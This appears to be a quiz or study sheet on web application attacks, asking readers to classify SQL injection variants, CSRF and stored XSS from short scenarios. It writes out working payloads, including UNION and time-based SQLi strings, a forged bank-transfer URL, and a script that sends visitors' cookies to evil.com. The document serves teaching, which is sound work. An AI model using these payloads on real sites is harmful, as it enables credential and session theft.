Web Application Attacks

A user enters ' OR 1=1-- in a login form, but no error is shown. Instead, the page behaves differently when true or false conditions are injected. There’s no visible database error message, but the attacker observes the application's response changing depending on the input. What type of

SQLi attack is this?

An attacker submits the following input:
' UNION SELECT username, password FROM users--
This causes the application to display usernames and passwords from a different table.

What type of attack is this?

An attacker sends the input:
1' OR IF(1=1, SLEEP(5), 0)--
The server takes a long time to respond, suggesting that the attacker can infer whether a condition is true or false based on the response delay.

What type of SQLi attack is this?

Alice is logged into her bank account in one browser tab. She clicks a link on a malicious website in another tab. Without her knowledge, a request is sent to https://bank.com/transfer?to=attacker&amount=1000, and the money is transferred.

What type of attack is this?

A user comments on a blog post by entering the following code:

<script>document.location='http://evil.com/steal?cookie=' + document.cookie</script>

Every time someone views the comment, their browser executes the script and sends their cookie to the attacker’s server.

What type of attack is this?

A search form on an e-commerce website allows users to search for products. The intended query is:

SELECT * FROM products WHERE category = 'electronics' AND released = 1;

An attacker modifies the URL to: https://example.com/products?category=electronics'--

What is the effect of this attack?

What type of SQL Injection manipulates application logic to change how a query behaves?